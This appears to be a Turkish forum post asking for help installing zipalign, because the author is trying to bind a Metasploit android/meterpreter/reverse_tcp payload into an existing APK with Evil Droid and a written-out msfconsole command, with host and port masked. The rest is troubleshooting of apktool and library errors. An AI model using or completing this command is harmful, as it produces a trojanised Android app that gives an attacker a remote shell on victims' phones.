Merhaba konu başlığında da belirttiğim gibi zipalign paketini bir turlu yukleyemiyorum. Zipalign'i ne icin kullanacığımdan kısaca bahsediyim. Konu daha anlaşılır olsun. Zipalign'i aslında iki apk dosyasını birleştirmek icin kullamak istiyorum. Bunun icin zipalign paketi gerekli. Evil Droid adlı bir uygulama var. Onun icinde zipalign paketini otomatik olarak kuruyor. Fakat "msfconsole -x apk.apk -p android/meterpreter/reverse_tcp LHOST=***** LPORT=**** R> new.apk" şeklinde terminalden apk birleştirme işlemi yaptığımda apktools hatası veriyor.

Hata resmi:

Resimde de gorduğunuz gibi. AptTool hatası alıyorum. Fakat AptTool'da hata olmadığını şu resimden gosterebilirim.

Fakat Terminale zipalign paketini calıştırmak istediğimde şoyle bir hata alıyorum.

Zipalign'i calıştırmak istediğim'de oluşan hata'daki paketi yuklemek istediğimde şoyle bir hata alıyorum. [apt-get install libc++]

Hatadaki Paketi de yuklemek istediğimde bu sefer başka hata alıyorum.

Yani Zipalign'de bir hata olduğu gayet acık. Zipalign'i belki baştan yuklesem sorun duzelir diye umuyorum. Başka forumlarda araştırma yaptığımda zipalignin dosyalarını lib64 klasorune taşıyorlar. Bu Seferde ben zipalignin dosyalarının bulunduğu klasorun nerede olduğunu bilmiyorum. Anlayacağınız işin icinden cıkamaz hale gelmiş bulunmaktayım. Lutfen yardım edin....